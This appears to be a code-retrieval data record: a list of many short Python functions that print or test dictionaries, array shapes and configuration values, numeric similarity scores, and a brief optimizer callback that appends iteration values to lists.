[ "def print_dict_dimensions(entities_db, title='Title', message=''):\n total = 0\n m = f'{title}\\n'\n for k1, v1 in entities_db.items():\n m += f'\\n{message}{k1}:\\n'\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if isinstance(v2, tuple):\n m += f'{k2} {v2[0]} mapped entities, {v2[1] * 100}% input {k2} coverage.\\n'\n else:\n print()\n m += f'{k2} {v2}\\n'\n else:\n if isinstance(v1, tuple):\n m += f'{v1[0]} mapped entities, {v1[1] * 100}% input coverage\\n'\n else:\n m += f'{v1}'\n\n print(f'{m}\\n')", "def recursive_dict_key_print(dict_in, spacer=\"\"):\n if type(dict_in) is not dict:\n return\n next_spacer = spacer + \" \"\n for key, value in dict_in.items():\n try:\n print(spacer, f\"{key} : {value.shape}\")\n except(AttributeError):\n print(spacer, key)\n recursive_dict_key_print(value, next_spacer)", "def test_dimensions(self):\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe()\n\t\tprint(details)\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe(layers=[self.first_layer])\n\t\tprint(details)\n\t\tN = details.N.to_numpy()[0]\n\t\tM = details.M.to_numpy()[0]\n\t\trf = details.rf.to_numpy()[0]\n\t\tnum_evals = details.num_evals.to_numpy()[0]\n\t\tprint(N,M,rf,num_evals)\n\t\t\n\t\tself.assertEqual(N,64)\n\t\tself.assertEqual(M,3)\n\t\tself.assertEqual(rf,9)\n\t\tself.assertEqual(num_evals,M*rf)", "def run_print_dict_examples():\n print()\n print_dict_keys(NAME_DICT)\n print()\n print_dict_items(NAME_DICT)", "def run_print_dict_examples():\n print()\n print_dict_keys(NAME_DICT)\n print()\n print_dict_items(NAME_DICT)", "def printt(dictionnary):\n for key, value in dictionnary.iteritems():\n print('{key}, size: {size}, {values}'.format(key=key, \n size=len(value), values=value[0:4]))", "def report_keyset(self):\n for i, matchset in enumerate(self.matches):\n if len(matchset) == 1:\n print \"[%02d]\" % i, fmt(sorted([k for k, data in matchset.items()]), BLUE)\n elif len(matchset) != 0:\n print \"[%02d]\" % i, fmt(sorted([k for k, data in matchset.items()]), WHITE)\n else:\n print \"[%02d]\" % i, fmt(\"[X]\", RED)", "def printDict(myDict):\n for key in myDict:\n print(f\"Version: --> {myDict[key]['version']} \")\n print(f\"Accuracy: --> {myDict[key]['accuracy']}\")\n print(f\"Time --> {myDict[key]['time_per_target']}\")\n print(f\"Penalty --> {myDict[key]['target_w_penalty']}\")\n print(f\"ID --> {myDict[key]['assessed_by']}\")\n print(f\"# --> {myDict[key]['attempt']}\")\n\n print()", "def metadata_print(metadata):\n\n print('{0:<10} {1}'.format('parameter', 'value'))\n for key in metadata:\n print('{0:<10} {1}'.format(key, metadata[key]))", "def printMap(values, klab, vlab, precision, offset=16):\n\tprint(klab.ljust(offset, \" \") + vlab)\n\tfor k in values.keys():\n\t\tv = values[k]\n\t\tks = toStr(k, precision).ljust(offset, \" \")\n\t\tvs = toStr(v, precision)\n\t\tprint(ks + vs)", "def printValues(self):\n\n for layer in self.LayerNames:\n print \"-------- {0} --------\".format(layer)\n print \"nWorkingModules: {0}\".format(self.nWorkingModules[layer])\n print \"Pixels per Layer\"\n print \" Pixels hit: {0}\".format(self.hitPix[layer])\n print \" Occupancy: {0}\".format(self.occupancies[layer])\n print \" Pixels hit per Module: {0}\".format(self.hitPixPerModule[layer])\n print \" Pixels hit per Area: {0}\".format(self.hitPixPerArea[layer])\n print \" Pixels hit per Area per sec: {0}\".format(self.hitPixPerAreaSec[layer])\n print \"Pixels per Det\"\n print \" Occupancy (Det): {0}\".format(self.Detoccupancies[layer])\n print \" Pixels hit per Det: 
{0}\".format(self.hitPixPerDet[layer])\n print \" Pixels hit per DetArea: {0}\".format(self.hitPixPerDetArea[layer])\n print \" Pixels hit per DetArea per sec: {0}\".format(self.hitPixPerDetAreaSec[layer])\n print \"Cluster per Layer\"\n print \" Clusters hit: {0}\".format(self.hitClusters[layer])\n print \" Clusters hit per module: {0}\".format(self.hitClustersPerModule[layer])\n print \" Clusters hit per Area: {0}\".format(self.hitClustersPerArea[layer])\n print \" Clusters hit per Area per sec: {0}\".format(self.hitClustersPerAreaSec[layer])\n print \"Clusters per Det\"\n print \" Clusters hit per Det: {0}\".format(self.hitClustersPerDet[layer])\n print \" Clusters hit per DetArea: {0}\".format(self.hitClustersPerDetArea[layer])\n print \" Clusters hit per DetArea per sec: {0}\".format(self.hitClustersPerDetAreaSec[layer])", "def test_get_dimension(self):\n\n v = Vector({ 'x': 1 })\n self.assertEqual(1, v.dimensions['x'])", "def printInfo(matrix):\n\n print(\"Groups:\")\n for group in matrix.matrix.group_labels:\n print(\"\\t{0}\".format(group))\n\n print(\"Samples:\")\n for sample in matrix.matrix.sample_labels:\n print(\"\\t{0}\".format(sample))", "def main():\n dims = params['dims']\n\n for d in dims:\n print('**** Running test for d={0:d} ****'.format(d))\n run_test(d)", "def visualize_debug(example_dict, prefix):\n region_string = example_dict[\"example_metadata\"][0].strip(\"\\x00\").split(\";\")[0].split(\"=\")[1].replace(\":\", \"-\")\n region_prefix = \"{}.{}\".format(prefix, region_string)\n \n for key in example_dict.keys():\n\n # visualize importances\n if \"importances\" in key:\n plot_name = \"{}.{}.pdf\".format(region_prefix, key)\n print plot_name\n plot_weights(np.squeeze(example_dict[key]), plot_name)\n\n # visualize pwm scores\n if \"pwm-scores\" in key:\n pass\n \n\n return None", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def print_image(img):\n for k in img:\n print(\"\".join([str(x) for x in k] ))", "def display_dict() -> None:\n for key in ascii_dict:\n print(key, ': ')\n for line in ascii_dict[key]:\n print(line)", "def show_info(self, group):\n print(group)\n for child in self.dict[group]:\n if child=='Version':\n print(child, ':', self(group, child))\n elif not self(group, child).shape:\n print(child, ':',self(group, child))\n else:\n print(child,': size', self(group, child).shape)", "def _format_dimensions(dimensions):\n if not dimensions:\n return \"\"\n\n dim_pairs = [\"%s=%s\" % (k, v) for k, v in dimensions.items()]\n return \"[%s]\" % (\",\".join(dim_pairs))", "def print_table():\n for key in _op_table.keys():\n print(key)\n for sub_key in _op_table[key]:\n print('\\t--' + sub_key)", "def debug(self):\n \n #path\n print('Path information:')\n for k, v in self.__path.items():\n print(k, v)\n \n #sample count\n print('Sample statistic of each phase')\n for k, v in self.__phase_sample_count.items():\n print(k, v)\n \n print('Sample statistic of each class')\n for k, v in self.__area_sample_count.items():\n print(k, v)\n \n print('Sample statistic of each train')\n for k, v in self.__train_sample_count.items():\n print(k, v)", "def recursively_print_structure(item, leading = ''):\n for key in item:\n if isinstance(item[key], h5py.Dataset):\n print(leading + key + ': ' + str(item[key].shape))\n else:\n print(leading + key)\n recursively_print_structure(item[key], leading + ' ')", "def 
printResults(self):\n for key in self.mDict.keys():\n print ('for {:d}, entries = {:d} and exits = {:d}'.format (key, self.mDict.get(key).get ('entries'), self.mDict.get(key).get ('exits')))", "def print_configuration_info():\n print(\"Selected dataset:\", DATASET) \n print(\"Dataset base directory:\", BASE_INPUT_DIR) \n print(\"Daytime option:\", DAYTIME) \n print(\"Nones option:\", NONES) \n print(\"Selected action/activity representation:\", OP)\n print(\"Number of epochs: \", EPOCHS)\n print(\"Number of folds for cross-validation: \", FOLDS)\n print(\"Input directory for data files:\", INPUT_DIR) \n print(\"Embedding matrix file:\", EMBEDDING_WEIGHTS)\n print(\"Action sequences (X) file:\", X_FILE) \n print(\"Word embedding file for activities:\", ACTIVITY_EMBEDDINGS) \n print(\"Activity to int mappings:\", ACTIVITY_TO_INT)\n print(\"Int to activity mappings:\", INT_TO_ACTIVITY) \n print(\"Experiment ID:\", EXPERIMENT_ID)\n print(\"Treat imbalance data:\", TREAT_IMBALANCE)\n print(\"Save intermediate plots:\", SAVE)\n print(\"Batch size:\", BATCH_SIZE)\n print(\"Dropout:\", DROPOUT)\n print(\"Loss:\", LOSS)", "def show(matrix):\n print(\"\",end=\" \")\n for k in sorted(matrix.keys()):\n print(k,end=\" \")\n \n for i,row in sorted(matrix.items()):\n print(\"\\n\" + str(i),end=\" \")\n for j in row:\n print(matrix[i][j],end=\" \")\n print()", "def print_anagram_sets(d):\r\n for v in d.values():\r\n if len(v) > 1:\r\n print(len(v), v)", "def print_info(self, i):\n\n im_size = self.image_size(i)\n print 'The path of the image is: {}'.format(self.image_path_at(i))\n print 'width: {}, height: {}'.format(im_size[0], im_size[1])\n \n attr_i = self.gtdb['attr'][i, :]\n print 'The attributes are: {}'.format(','.join([self._classes[i] for i in np.where(attr_i==1)[0]]))", "def printsection(section):\n print('===')\n for key in section.keys():\n print(\"Key: %s\" % key)\n for item in section[key]:\n print(' %s' % item)", "def view_shapes(xm_train, xm_dev, xm_test, ym_train, ym_dev, ym_test):\n\n print('X_train shape: ' + str(xm_train.shape))\n print('Y_train shape: ' + str(ym_train.shape))\n print('X_dev shape: ' + str(xm_dev.shape))\n print('Y_dev shape: ' + str(ym_dev.shape))\n print('X_test shape: ' + str(xm_test.shape))\n print('Y_test shape: ' + str(ym_test.shape))\n print('\\n')", "def dimensions():", "def print_model_definitions(self):\n sys.stdout.write(\"Model Dimensions\\n\")\n sys.stdout.write(\"----------------\\n\")\n for key, val in self.dimensions.iteritems():\n sys.stdout.write(\"{key}: {val}\\n\".format(key=key, val=val))", "def print_kwargs(**kwargs):\n for key in kwargs:\n print('%s %s' %(key, kwargs[key]))", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)", "def show_shape_metrics(shape):", "def test_basic_property_of_random_matrix():\n for name, random_matrix in all_random_matrix.items():\n print(name)\n\n check_input_size_random_matrix(random_matrix)\n check_size_generated(random_matrix)\n if name != \"random_subsample_normalized\":\n check_zero_mean_and_unit_norm(random_matrix)\n check_approximate_isometry(random_matrix)", "def test_RegionDimensionsBox_extractFromLinesWithKey(self):\r\n\r\n regionDimensions = RegionDimensions.RegionDimensionsBox()\r\n\r\n numberParameters = 6\r\n self.assertEquals(numberParameters, 
len(regionDimensions._keys))\r\n\r\n line = \"RegionParameters=0.000000 10000000000.000000 -10000000000.000000 10000000000.000000 0.000000 20000000000.000000\"\r\n regionDimensions.extractFromLinesWithKey(line)\r\n\r\n self.assertEquals(0.0, regionDimensions.minimumX)\r\n self.assertEquals(10000000000.0, regionDimensions.maximumX)\r\n self.assertEquals(-10000000000.0, regionDimensions.minimumY)\r\n self.assertEquals(10000000000.0, regionDimensions.maximumY)\r\n self.assertEquals(0.0, regionDimensions.minimumZ)\r\n self.assertEquals(20000000000.0, regionDimensions.maximumZ)\r\n\r\n #self.fail(\"Test if the testcase is working.\")\r", "def print_config(config_dic, logger):\n for k, v in config_dic.items():\n logger.info(\"{}:\\t{}\".format(k.ljust(15), v))", "def print_q(q):\n for key in sorted(q.keys()):\n print(key, end=\" \")\n value = q[key]\n for i in range(len(value)):\n print(value[i], end=\" \")\n print()", "def dimension_check():\n print(\"### DIMENSION CHECK ###\")\n print(X.shape,\n y.shape,\n X_train.shape,\n y_train.shape,\n X_test.shape,\n y_test.shape,\n weights.shape)\n print(\"### END ###\")", "def print_metric_dict(self, metric_dict):\n print(\"\".join([\" {}: {:4f},\".format(k, v) for k, v in metric_dict.items()]))", "def printdict(input_dict):\n for key in input_dict:\n print key, \":\", input_dict[key]", "def print_device_dict(device_dict):\n for device_id in device_dict:\n print(str(device_id) + ':', device_dict[device_id]['name'])", "def info(d, return_dict=False, print_=True):\n info_ = {}\n for k,v in d.items():\n if isinstance(v, dict):\n info_.update(info(v))\n else:\n info_[k] = {\n 'size': np.asarray(v).ravel().shape,\n 'shape' :np.asarray(v).shape,\n 'dtype': np.asarray(v).dtype.name\n }\n if print_:\n _v = np.asarray(v)\n print('key -', k)\n print('dtype -', _v.dtype.name)\n print('size -', np.asarray(v).ravel().shape)\n print('shape -', _v.shape)\n print()\n if return_dict:\n return info_", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)", "def print_output():\n print(\"count: [primary: \"+str(primary_shards)+\", replica: \"+str(secondary_shards)+\"]\")\n print(\"size: [primary: \"+pretty_print_storage(total_size_primary)+\", replica: \"+pretty_print_storage(total_size_secondary)+\"]\")\n print(\"disk-max-node: \"+max_size_node_name)\n print(\"watermark-breached: \"+str(watermark_breached))", "def info(self, n=80):\n # concatenate list of index dimensions and levels\n info = f\"{type(self)}\\nIndex dimensions and data coordinates:\\n\"\n c1 = max([len(i) for i in self.dimensions]) + 1\n c2 = n - c1 - 5\n info += \"\\n\".join(\n [\n f\" {i:{c1}}: {print_list(getattr(self, i), c2)}\"\n for i in self.dimensions\n ]\n )\n\n return info", "def show_map(map_):\n for r in map_.matrix:\n print(''.join(r))\n print()", "def display(self):\n # type: ()->None\n print('============')\n for key, value in self._ifAttributes.items():\n if isinstance(value, list):\n print(key + ': ')\n for item in value:\n print('\\t' + item)\n elif isinstance(value, dict):\n print(key + ': ')\n for item in value.keys():\n print('\\t' + item + ': ' + value[item])\n else:\n print(key + ': ' + str(value))\n print('============')", "def dimension_testing(self, dimension):\n if dimension in self.allowed_dimensions:\n return ''\n else:\n error_msg = 'Dimension 
%s is not supported. Choose from %s' % (dimension, self.allowed_dimensions)\n return error_msg", "def print_map(self):\n y_max,x_max = map(max, zip(*self.mp.keys()))\n for row in range(0,y_max+1):\n msg = []\n for k in range(0,x_max+1):\n msg.append(chr(self.mp[row,k]))\n print(\"\".join(msg))", "def display_layers(layers, wide, tall):\n\n colours = {\n \"0\": \" \",\n \"1\": \" # \",\n }\n\n for row in range(tall):\n for col in range(wide):\n pixels = [layer[row][col] for layer in layers]\n line = next(colours[p] for p in pixels if p in colours)\n print(line, end=\"\")\n print()", "def print_infrastructure(aws_key, aws_secret):\n _, _, _, redshift_client = create_clients(aws_key, aws_secret)\n for k, v in get_cluster_properties(redshift_client):\n print(k, v)", "def valid_config_keys():\n click.echo(', '.join(get_class_properties(GenConfig)))", "def printPicnic(itemsDict: dict, leftWidth: int, rightWidth: int) -> None:\n print('PICNIC ITEMS'.center(leftWidth + rightWidth, '-'))\n for k, v in itemsDict.items():\n print(k.ljust(leftWidth, '.') + str(v).rjust(rightWidth))", "def show_values():\n dic_drg = {}\n dic_age = {}\n dic_sex = {}\n dic_sline = {}\n for tup in all_data:\n drg = tup[7]\n age = tup[9]\n sex = tup[10]\n sline = tup[14]\n\n dic_drg[drg] = 1\n dic_age[age] = 1\n dic_sex[sex] = 1\n dic_sline[sline] = 1\n\n print \"Age values\"\n for key in sorted(dic_age.keys()):\n print key\n\n print \"Sex values\"\n for key in sorted(dic_sex.keys()):\n print key\n\n print \"Service line values\"\n for key in sorted(dic_sline.keys()):\n if key is None or len(key) == 0:\n continue\n print \"'\" + key + \"',\",\n print\n\n print \"Drg values\"\n for key in sorted(dic_drg.keys()):\n if key is None or len(key) == 0:\n continue\n print\"'\" + key + \"',\",\n print", "def test_section_keys(self):\n ars = self.ar[2009][11]['general']\n self.assertEqual(ars.keys(), self.__class__.wanted_lines)", "def test_getitem(self):\n space = Space()\n probs = (0.1, 0.2, 0.3, 0.4)\n categories = (\"asdfa\", 2, 3, 4)\n dim = Categorical(\"yolo\", OrderedDict(zip(categories, probs)), shape=2)\n space.register(dim)\n dim = Integer(\"yolo2\", \"uniform\", -3, 6)\n space.register(dim)\n dim = Real(\"yolo3\", \"norm\", 0.9)\n space.register(dim)\n\n assert space[\"yolo\"].type == \"categorical\"\n assert space[0].type == \"categorical\"\n\n with pytest.raises(KeyError):\n space[\"asdf\"]\n\n with pytest.raises(IndexError):\n space[3]", "def test_main_multiple_keys(self):\n args = [\n \"--layout\",\n self.layout_double_signed_path,\n \"--layout-keys\",\n self.alice_path,\n self.bob_path,\n ]\n self.assert_cli_sys_exit(args, 0)", "def test_main_multiple_keys(self):\n args = [\n \"--layout\",\n self.layout_double_signed_path,\n \"--layout-keys\",\n self.alice_path,\n self.bob_path,\n ]\n self.assert_cli_sys_exit(args, 0)", "def test_partially_one(self):\n setups = self.get_setup().decompress([\"dimensions.species_id\"])\n assert isinstance(setups, PlotSetupGroup)\n assert all(isinstance(setup, PlotSetup) for setup in setups)\n assert len(setups) == 2\n res = {\n (\n s.panels.collect_equal(\"dimensions\").variable,\n s.panels.collect_equal(\"dimensions\").species_id,\n s.panels.collect_equal(\"dimensions\").time,\n )\n for s in setups\n }\n sol = {\n ((\"dry_deposition\", \"wet_deposition\"), 1, (1, 2, 3)),\n ((\"dry_deposition\", \"wet_deposition\"), 2, (1, 2, 3)),\n }\n assert res == sol", "def test_all_keys(self):\n\t\tdocumentation: dict = self.handlerObject.build_swagger_documentation()\n\t\t# print(\"Test 
documentation was generated. The corresponding object is:\\n{0}\".format(documentation))\n\t\tself.assertTrue(compare_keys(documentation, TEST_ALL_KEYS_EXPECTED_OUTPUT))", "def cli(dimensions):\r\n click.echo(\"Iris Flower classifier\\n\")\r\n \r\n\r\n click.echo(\"Calculating result...\")\r\n time.sleep(1)\r\n results = zip(dimm_names, dimensions)\r\n click.echo(\"Input data:\")\r\n for i, j in results:\r\n click.echo(\"{:12} -> {}\".format(i, j))\r\n\r\n click.echo()\r\n click.echo(\"Your flower seems to be fine example of:\")\r\n click.secho(\"{}\".format(\"species\"), fg='green', bold=True)", "def check_and_print_if_error(self): # pragma: no cover\n dupes, empties, not_detected = self._get_aberrations()\n if dupes:\n print 'duplicate entries for:'\n for dup, matches in dupes:\n print ' %s: %s' % (dup, [f.func_name for f in matches])\n if empties:\n print 'empty entries for:'\n for empty in empties:\n print ' ' + str(empty)\n if not_detected:\n print 'dimensions not detected:'\n for n_d in not_detected:\n print ' ' + str(n_d)\n return self.is_correct", "def test_dict_keywords(self):\n output, _err = self.executor.docker.run('lego:1', env=dict(SPECIAL='emett',\n SONG='awesome')).batch()\n self.assertEqual(output, 'everything')", "def printDicts():\n for k in key:\n print k, key[k]\n \n for f in freq:\n print f, freq[f]\n \n for e in english:\n print e, english[e]", "def print_data():\r\n\r\n d = data()\r\n for i in d:\r\n for key, value in i.items():\r\n print(key, \" : \", value)\r\n print()", "def test_get_dimensions_by_label(self):\n\n dimensions, dim_names = pyjstat.get_dimensions(\n self.oecd_datasets['oecd'], 'label')\n self.assertTrue(dim_names[2] == '2003-2014')\n self.assertTrue(dimensions[0].iloc[0]['label'] == 'Unemployment rate')", "def print_possibility_space():\n\n print(\"Possibility space:\")\n print(\" {} unique sword images\".format(calculate_image_possibilities()))", "def test_product_initialization(product_design_space):\n assert product_design_space.name == 'my design space'\n assert product_design_space.description == 'does some things'\n assert len(product_design_space.dimensions) == 3\n assert product_design_space.dimensions[0].descriptor.key == 'alpha'\n assert product_design_space.dimensions[1].descriptor.key == 'beta'\n assert product_design_space.dimensions[2].descriptor.key == 'gamma'", "def print_img_data(img,title='Image'):\n print(f'________ {title} _______')\n if len(image.shape) == 2:\n print(f'min:{img.min()} max:{img.max()} shape:{img.shape}\\\n\\nmean:{img.mean()} std:{img.std()} type:{type(img[0,0])}\\n')\n elif len(image.shape) == 3:\n print(f'min:{img.min()} max:{img.max()} shape:{img.shape}\\\n\\nmean:{img.mean()} std:{img.std()} type:{type(img[0,0,0])}\\n')", "def test17():\n\n\twardrobe = {\"shirt\":[\"red\",\"blue\",\"white\"], \"jeans\":[\"blue\",\"black\"]}\n\tfor cloth in wardrobe.keys():\n\t\tfor color in wardrobe[cloth]:\n\t\t\tprint(\"{} {}\".format(color,cloth))", "def print_info(self):\n print(\"Experiment key: \" + self.key)\n print(\"Experiment name: \" + self.name)\n print(\"Experiment path: \" + self.output_path)\n print(\"Auto-sync activated: \" + str(self.auto_sync))\n print(\"\")\n print(\"Experiment metadata: \")\n print(self.exp_metadata.to_str())", "def print_stats(ds):\n print(\"Dataset Name: \" + ds.name)\n print(\"Dataset Mode: \" + ds.mode)\n print(\"Band Count: \" + str(ds.count))\n print(\"Dataset Width: \" + str(ds.width))\n print(\"Dataset Height: \" + str(ds.height))\n print(\"Dataset Bounds: \", ds.bounds)\n 
print(\"Dataset Transform: \", ds.transform)\n ul = ds.transform * (0, 0)\n print(\"Upper Left Corner: \", ul)\n lr = ds.transform * (ds.width, ds.height)\n print(\"Lower Right Corner: \", lr)\n {i: dtype for i, dtype in zip(ds.indexes, ds.dtypes)}", "def print_args(args):\n _args = vars(args)\n max_length = max([len(k) for k, _ in _args.items()])\n for k, v in _args.items():\n print(' ' * (max_length - len(k)) + k + ': ' + str(v))", "def print_eval(eval_dict):\n\n status = ''.join(\n ['{}: {:.6f}, '.format(key, eval_dict[key]) for key in sorted(eval_dict)])\n print(status[:-2])", "def view_keys(dict):\n claves=list(dict.keys())\n claves.sort()\n for line in claves:\n print(line.upper(),' = ',dict[line])", "def test_antialiasing():\n images = generate_test_images()\n loaded = load_test_images(images)\n print(list(loaded.keys()))\n for description in images.keys():\n assert (images[description] == loaded[description]).all()", "def test_map_basics(self):\n self.assertDigitizerMapBasics(self.map, self.dgroup)", "def print_seeds(self):\n for key in self.CONFIG.keys():\n if \"EMI\" in key:\n print key", "def display_map():\r\n for row in range(0, len(map1)): #for all rows\r\n for column in range(0, len(map1[0])): #for all columns\r\n print(map1[row][column], end=' ')\r\n print()", "def var_sizes_check(global_dic):\n import types\n def _print(a, b):\n print(\"|{:>15}|{:>13}|\".format(a, b))\n\n _print(\"Variable\", \"Size\")\n print(\"-\"*31)\n for k, v in global_dic.items():\n if not k.startswith('_') and not isinstance(v, types.ModuleType):\n # print size of variable\n if hasattr(v, 'size'):\n try:\n _print(k, v.size)\n except:\n continue\n # print length of variable\n elif hasattr(v, '__len__'):\n try:\n _print(k, len(v))\n except:\n continue", "def helper():\n for mode in PackingMode:\n for bin_algo in PackingBin:\n for size, w, h in ('big_enough', 50, 50), ('too_small', 5, 5):\n name = '_'.join(('test', mode, bin_algo, size))\n print(\"\"\"\\\n def %s(self):\n # create bins that are %s to hold the rectangles\n p = self._common(PackingMode.%s, PackingBin.%s, %s, %s)\"\"\" %\n (name, size.replace('_', ' '), mode, bin_algo, w, h))\n if size == 'big_enough':\n print(\"\"\"\\\n # check that bins were created\n self.assertGreater(len(p.bin_list()), 0)\n # check that all of the rectangles made it in\n self.assertEqual(len(p.rect_list()), len(self.rectangles))\n\"\"\")\n else:\n print(\"\"\"\\\n # check that none of the rectangles made it in\n self.assertEqual(len(p.rect_list()), 0)\n\"\"\")", "def print_character(character):\n for k, v in character.items():\n print(str(k) + ': ' + str(v)) # Prints every key:value pair in character dictionary\n if len(character) == 8:\n print(\"Inventory:\" + str(character[7])) # If there is an inventory, then print it as well", "def pretty_keys(dictionary):\n if not dictionary:\n return []\n # - number of keys printed per line\n num = 5\n # - turn into sorted list\n keys = list(dictionary.keys())\n keys.sort()\n # - fill with blank elements to width num\n missing = (len(keys) % num)\n if missing != 0:\n to_add = num - missing\n keys.extend([''] * to_add)\n # - turn into 2D matrix\n matrix = [[keys[i+j] for i in range(0, num)]\n for j in range(0, len(keys), num)]\n # - calculate max width for each column\n len_matrix = [[len(col) for col in row] for row in matrix]\n max_len_col = [max([row[j] for row in len_matrix])\n for j in range(0, num)]\n # - pad with spaces\n matrix = [[row[j].ljust(max_len_col[j]) for j in range(0, num)]\n for row in matrix]\n # - return 
list of lines to print\n matrix = [' '.join(row) for row in matrix]\n return matrix", "def testFourDimensions(self):\n false1 = (True, True, True, False)\n false2 = (True, False, True, False)\n true1 = (False, True, False, True)\n true2 = (True, True, False, False)\n tt = cros_test_lib.TruthTable(inputs=(false1, false2), input_result=False)\n self.assertEquals(len(tt), pow(2, 4))\n\n # Check truth table output.\n self.assertFalse(tt.GetOutput(false1))\n self.assertFalse(tt.GetOutput(false2))\n self.assertTrue(tt.GetOutput(true1))\n self.assertTrue(tt.GetOutput(true2))\n\n # Check assertions on bad input to GetOutput.\n self.assertRaises(TypeError, tt.GetOutput, True)\n self.assertRaises(ValueError, tt.GetOutput, (True, True, True))\n\n # Check iteration over input lines.\n lines = list(tt)\n self.assertEquals((False, False, False, False), lines[0])\n self.assertEquals((False, False, False, True), lines[1])\n self.assertEquals((False, True, True, True), lines[7])\n self.assertEquals((True, True, True, True), lines[15])\n\n self._TestTableSanity(tt, lines)", "def test_overall_report_keys():\n keys = overall_data.keys()\n assert('banner_report' in keys)\n assert('rewarded_report' in keys)\n assert('interstitial_report' in keys)\n assert('overall_report' in keys)", "def printMetadata(metadata):\n\tif metadata:\n\t\tfor x in metadata:\n\t\t print(x+': {}'.format(metadata[x]) )\n\t\treturn True\n\telse:\n\t\tprint('metadata empty')\n\t\tprint('unable to find metadata at this location')\n\t\tprint('')\n\t\treturn False", "def print_dict(dictionary):\n for x,y in dictionary.items():\n print(x, y)", "def print_args():\n for key, value in vars(ARGS).items():\n print(key + ' : ' + str(value))", "def _debug_print(self, cfg, list_iterstore):\n def __print_params(iterstore, edataset):\n if (edataset not in iterstore): return\n gen = iterstore[edataset]\n if (gen is not None):\n if (gen._params is not None):\n print('{} : {}'.format(edataset, gen))\n print(\"\\tIterator Parameters: (iter_param, iter_pp_param)\")\n print(\"\\t-------------------------------------------------\")\n for key, val in gen._params.items():\n if (key.startswith('_')): continue\n print('\\t{} : {}'.format(key, val))\n \n if (gen._pp_params is not None):\n print(\"\\t-------------------------------------------------\")\n for key, val in gen._pp_params.items():\n if (key.startswith('_')): continue\n print('\\t{} : {}'.format(key, val))\n print(\"\")\n\n if (list_iterstore is None):\n return\n\n print(\"\\nNNCfg\")\n print(\"=====\")\n for key, val in cfg.__dict__.items():\n if (key.startswith('_')): continue\n print('\\t{} : {}'.format(key, val))\n\n for i, iterstore in enumerate(list_iterstore):\n print(\"\\nIterator Store:{}\".format(i))\n print(\"=================\")\n __print_params(iterstore, Dataset.TR)\n __print_params(iterstore, Dataset.VAL)\n __print_params(iterstore, Dataset.TE)\n __print_params(iterstore, Dataset.TR_OUT)\n __print_params(iterstore, Dataset.VAL_OUT)\n __print_params(iterstore, Dataset.TE_OUT)", "def printCounterByKey(counter):\n for k in counter.keys():\n print(k, counter[k])", "def print(self):\n tiles = list(map(list, zip(*self.tiles))) # transposed\n print('tiles = [')\n for row in tiles:\n print('\\t' + repr(row))\n print(']')\n print('props = [')\n for prop in self.props:\n print('\\t' + repr(prop))\n print(']')", "def _print_issue(issue, ntabs):\n for key, value in issue.items():\n if isinstance(value, dict):\n tabs = TAB*ntabs\n print('%s%s (section):' % (tabs, key))\n ntabs += 1\n 
print_issue(value, ntabs=ntabs)\n elif isinstance(value, bool):\n if value == False:\n tabs = TAB*ntabs\n print('%s%s parameter is missing.' % (tabs, key))\n continue\n else:\n tabs = TAB*ntabs\n print('%s%s (parameter):' % (tabs, key))\n tabs = TAB*(ntabs+1)\n print('%s%s' % (tabs, value))", "def test_print_args_dict(self):\n log_file = os.path.join(DATA_DIR, 'sample_log.txt')\n if os.path.exists(log_file):\n os.remove(log_file)\n self.assertEqual(os.path.exists(log_file), False)\n manager = execution.LogManager('MainThread', log_file)\n\n args = {}\n manager.print_args(args)\n self.assertEqual(count_lines(log_file), 4)\n os.remove(log_file)", "def show(self, keys=None, sort_keys_function=None):\n output_keys = keys or self.keys\n if not self.items:\n print(\"No items to show\")\n else:\n for item in self.__get_items(sort_keys_function):\n for output_key in output_keys:\n print(\"{0:25}: {1!s}\".format(output_key, getattr(item, self.mapping[output_key])))\n print(\"-\" * 25)", "def _validate_dimensions(config):\n logging.info(\"Checking provided dimensions are valid\")\n for feature in config.get(\"test-suites\").values():\n for test_name, test in feature.items():\n for dimensions_config in test[\"dimensions\"]:\n _validate_schedulers(config, dimensions_config.get(\"schedulers\", []))\n if [] in dimensions_config.values():\n logging.error(\"Values assigned to dimensions in test %s cannot be empty\", test_name)\n raise AssertionError" ]
[ "0.6196142", "0.6052784", "0.60204434", "0.60203207", "0.60203207", "0.5951763", "0.5832673", "0.5800634", "0.57597065", "0.57452214", "0.5724362", "0.57028264", "0.5698949", "0.5673566", "0.55920947", "0.55707216", "0.55707216", "0.55645055", "0.55363876", "0.55324614", "0.5518316", "0.55090666", "0.5499341", "0.548178", "0.5478478", "0.54699993", "0.5468296", "0.54496485", "0.5448419", "0.5438902", "0.543411", "0.54339284", "0.54306924", "0.54299736", "0.542923", "0.542923", "0.54172844", "0.5412934", "0.5412774", "0.5400309", "0.5394097", "0.5367837", "0.53635", "0.5345432", "0.53444993", "0.533711", "0.5334534", "0.5334534", "0.5322644", "0.5293944", "0.5291729", "0.52869475", "0.52826405", "0.5278914", "0.5275319", "0.5264936", "0.52647614", "0.52609456", "0.52555794", "0.5238312", "0.5233251", "0.5221002", "0.5221002", "0.52190477", "0.52118474", "0.5211352", "0.5200684", "0.5199169", "0.51973724", "0.51934826", "0.5193201", "0.5190238", "0.518372", "0.5182519", "0.51745087", "0.51735187", "0.517007", "0.51644474", "0.51624066", "0.5154629", "0.514665", "0.5140157", "0.51400524", "0.5138696", "0.51369697", "0.51302654", "0.51292753", "0.51231873", "0.5122311", "0.5121215", "0.5119518", "0.5116301", "0.5110447", "0.51083237", "0.510648", "0.5098904", "0.5092542", "0.50807106", "0.5080643", "0.5078626" ]
0.5100301
95
The callback function for the optimize process. It records iteration values and monitors the current optimiser solutions.
def callbackMonitor(dim):
    bstRecord.append(dim[0])
    tstRecord.append(dim[1])
